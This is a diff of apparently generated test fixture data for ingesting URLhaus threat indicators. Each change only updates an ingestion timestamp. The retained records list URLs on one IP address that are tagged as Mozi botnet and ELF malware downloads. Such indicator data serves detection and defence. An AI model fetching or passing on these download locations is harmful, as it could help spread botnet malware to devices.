"{\"id\":\"961149\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961149/\",\"url\":\"http://89.160.20.156:43245/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:04:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -19297,7 +19297,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027370900Z", + "ingested": "2021-12-14T14:56:15.726564047Z", "original": "{\"id\":\"961150\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961150/\",\"url\":\"http://89.160.20.156:50444/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:04:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"true\",\"tags\":[\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -19345,7 +19345,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027377800Z", + "ingested": "2021-12-14T14:56:15.726564415Z", "original": "{\"id\":\"961144\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961144/\",\"url\":\"http://89.160.20.156:51318/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:04:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"true\",\"tags\":[\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -19394,7 +19394,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027384700Z", + "ingested": "2021-12-14T14:56:15.726564924Z", "original": "{\"id\":\"961145\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961145/\",\"url\":\"http://89.160.20.156:46221/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:04:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -19443,7 +19443,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027391600Z", + "ingested": "2021-12-14T14:56:15.726565358Z", "original": "{\"id\":\"961146\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961146/\",\"url\":\"http://89.160.20.156:51430/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:04:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -19492,7 +19492,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027398500Z", + "ingested": "2021-12-14T14:56:15.726565726Z", "original": "{\"id\":\"961147\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961147/\",\"url\":\"http://89.160.20.156:52028/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:04:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -19541,7 +19541,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027405500Z", + "ingested": "2021-12-14T14:56:15.726566087Z", "original": "{\"id\":\"961148\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961148/\",\"url\":\"http://89.160.20.156:48291/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:04:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -19589,7 +19589,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T08:40:08.027467600Z",
+ "ingested": "2021-12-14T14:56:15.726566458Z",
 "original": "{\"id\":\"961143\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961143/\",\"url\":\"http://89.160.20.156:39613/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:04:03 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"false\",\"tags\":[\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
@@ -19639,7 +19639,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T08:40:08.027478700Z",
+ "ingested": "2021-12-14T14:56:15.726566940Z",
 "original": "{\"id\":\"961142\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961142/\",\"url\":\"http://89.160.20.156:34201/bin.sh\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:56:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"arm\",\"elf\"]}",
 "category": "threat",
 "type": "indicator",
@@ -19688,7 +19688,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T08:40:08.027486300Z",
+ "ingested": "2021-12-14T14:56:15.726567368Z",
 "original": "{\"id\":\"961141\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961141/\",\"url\":\"http://89.160.20.156:47095/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:53:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
@@ -19737,7 +19737,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T08:40:08.027493300Z",
+ "ingested": "2021-12-14T14:56:15.726567727Z",
 "original": "{\"id\":\"961136\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961136/\",\"url\":\"http://89.160.20.156:42004/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:53:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
@@ -19786,7 +19786,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T08:40:08.027500200Z",
+ "ingested": "2021-12-14T14:56:15.726568102Z",
 "original": "{\"id\":\"961137\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961137/\",\"url\":\"http://89.160.20.156:52058/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:53:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
@@ -19835,7 +19835,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T08:40:08.027507200Z",
+ "ingested": "2021-12-14T14:56:15.726568962Z",
 "original": "{\"id\":\"961138\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961138/\",\"url\":\"http://89.160.20.156:45432/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:53:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
@@ -19884,7 +19884,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T08:40:08.027514Z",
+ "ingested": "2021-12-14T14:56:15.726569444Z",
 "original": "{\"id\":\"961139\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961139/\",\"url\":\"http://89.160.20.156:49891/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:53:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
@@ -19933,7 +19933,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T08:40:08.027521Z",
+ "ingested": "2021-12-14T14:56:15.726569816Z",
 "original": "{\"id\":\"961140\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961140/\",\"url\":\"http://89.160.20.156:34334/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:53:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
@@ -19982,7 +19982,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T08:40:08.027528Z",
+ "ingested": "2021-12-14T14:56:15.726570199Z",
 "original": "{\"id\":\"961135\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961135/\",\"url\":\"http://89.160.20.156:42886/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:52:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
@@ -20031,7 +20031,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T08:40:08.027535Z",
+ "ingested": "2021-12-14T14:56:15.726570567Z",
 "original": "{\"id\":\"961134\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961134/\",\"url\":\"http://89.160.20.156:47096/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:52:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
@@ -20080,7 +20080,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T08:40:08.027541800Z",
+ "ingested": "2021-12-14T14:56:15.726571069Z",
 "original": "{\"id\":\"961132\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961132/\",\"url\":\"http://89.160.20.156:48214/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:52:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
@@ -20129,7 +20129,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T08:40:08.027548700Z",
+ "ingested": "2021-12-14T14:56:15.726571436Z",
 "original": "{\"id\":\"961133\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961133/\",\"url\":\"http://89.160.20.156:40478/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:52:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
@@ -20178,7 +20178,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T08:40:08.027555600Z",
+ "ingested": "2021-12-14T14:56:15.726571801Z",
 "original": "{\"id\":\"961130\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961130/\",\"url\":\"http://89.160.20.156:37771/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:51:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
@@ -20227,7 +20227,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T08:40:08.027562700Z",
+ "ingested": "2021-12-14T14:56:15.726572173Z",
 "original": "{\"id\":\"961131\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961131/\",\"url\":\"http://89.160.20.156:35513/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:51:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
@@ -20276,7 +20276,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T08:40:08.027569600Z",
+ "ingested": "2021-12-14T14:56:15.726572625Z",
 "original": "{\"id\":\"961129\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961129/\",\"url\":\"http://89.160.20.156:53382/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:51:03 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
@@ -20325,7 +20325,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T08:40:08.027576400Z",
+ "ingested": "2021-12-14T14:56:15.726573049Z",
 "original": "{\"id\":\"961128\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961128/\",\"url\":\"http://89.160.20.156:50336/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:50:17 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
@@ -20374,7 +20374,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T08:40:08.027583300Z",
+ "ingested": "2021-12-14T14:56:15.726573491Z",
 "original": "{\"id\":\"961124\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961124/\",\"url\":\"http://89.160.20.156:34233/Mozi.a\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
@@ -20423,7 +20423,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T08:40:08.027590200Z",
+ "ingested": "2021-12-14T14:56:15.726573854Z",
 "original": "{\"id\":\"961125\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961125/\",\"url\":\"http://89.160.20.156:38392/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
@@ -20472,7 +20472,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T08:40:08.027597200Z",
+ "ingested": "2021-12-14T14:56:15.726574571Z",
 "original": "{\"id\":\"961126\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961126/\",\"url\":\"http://89.160.20.156:52654/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
@@ -20521,7 +20521,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T08:40:08.027604200Z",
+ "ingested": "2021-12-14T14:56:15.726574988Z",
 "original": "{\"id\":\"961127\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961127/\",\"url\":\"http://89.160.20.156:60203/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
@@ -20570,7 +20570,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T08:40:08.027611200Z",
+ "ingested": "2021-12-14T14:56:15.726575349Z",
 "original": "{\"id\":\"961123\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961123/\",\"url\":\"http://89.160.20.156:48091/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:50:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
@@ -20619,7 +20619,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T08:40:08.027618Z",
+ "ingested": "2021-12-14T14:56:15.726575712Z",
 "original": "{\"id\":\"961122\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961122/\",\"url\":\"http://89.160.20.156:40783/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:49:41 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
@@ -20668,7 +20668,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T08:40:08.027625300Z",
+ "ingested": "2021-12-14T14:56:15.726576082Z",
 "original": "{\"id\":\"961121\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961121/\",\"url\":\"http://89.160.20.156:52015/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:49:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
@@ -20717,7 +20717,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T08:40:08.027632200Z",
+ "ingested": "2021-12-14T14:56:15.726576614Z",
 "original": "{\"id\":\"961118\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961118/\",\"url\":\"http://89.160.20.156:42987/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:37:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
@@ -20766,7 +20766,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T08:40:08.027639300Z",
+ "ingested": "2021-12-14T14:56:15.726576978Z",
 "original": "{\"id\":\"961119\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961119/\",\"url\":\"http://89.160.20.156:53388/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:37:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
@@ -20815,7 +20815,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T08:40:08.027646100Z",
+ "ingested": "2021-12-14T14:56:15.726577348Z",
 "original": "{\"id\":\"961120\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961120/\",\"url\":\"http://89.160.20.156:44124/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:37:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
@@ -20864,7 +20864,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T08:40:08.027653Z",
+ "ingested": "2021-12-14T14:56:15.726577726Z",
 "original": "{\"id\":\"961115\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961115/\",\"url\":\"http://89.160.20.156:33802/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:37:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
@@ -20913,7 +20913,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T08:40:08.027659900Z",
+ "ingested": "2021-12-14T14:56:15.726578196Z",
 "original": "{\"id\":\"961116\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961116/\",\"url\":\"http://89.160.20.156:43806/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:37:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
@@ -20962,7 +20962,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T08:40:08.027666800Z",
+ "ingested": "2021-12-14T14:56:15.726578619Z",
 "original": "{\"id\":\"961117\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961117/\",\"url\":\"http://89.160.20.156:52278/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:37:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
@@ -21011,7 +21011,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T08:40:08.027673700Z",
+ "ingested": "2021-12-14T14:56:15.726578990Z",
 "original": "{\"id\":\"961114\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961114/\",\"url\":\"http://89.160.20.156:41202/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:37:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
@@ -21060,7 +21060,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T08:40:08.027680600Z",
+ "ingested": "2021-12-14T14:56:15.726579360Z",
 "original": "{\"id\":\"961113\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961113/\",\"url\":\"http://89.160.20.156:35756/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:36:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
@@ -21109,7 +21109,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T08:40:08.027687600Z",
+ "ingested": "2021-12-14T14:56:15.726579785Z",
 "original": "{\"id\":\"961112\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961112/\",\"url\":\"http://89.160.20.156:40569/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:36:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
@@ -21158,7 +21158,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T08:40:08.027694600Z",
+ "ingested": "2021-12-14T14:56:15.726580244Z",
 "original": "{\"id\":\"961111\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961111/\",\"url\":\"http://89.160.20.156:47645/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:36:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
@@ -21207,7 +21207,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T08:40:08.027701700Z",
+ "ingested": "2021-12-14T14:56:15.726580660Z",
 "original": "{\"id\":\"961110\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961110/\",\"url\":\"http://89.160.20.156:40023/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:35:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
@@ -21256,7 +21256,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T08:40:08.027708700Z",
+ "ingested": "2021-12-14T14:56:15.726581031Z",
 "original": "{\"id\":\"961109\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961109/\",\"url\":\"http://89.160.20.156:53402/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:34:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
@@ -21306,7 +21306,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T08:40:08.027715600Z",
+ "ingested": "2021-12-14T14:56:15.726581413Z",
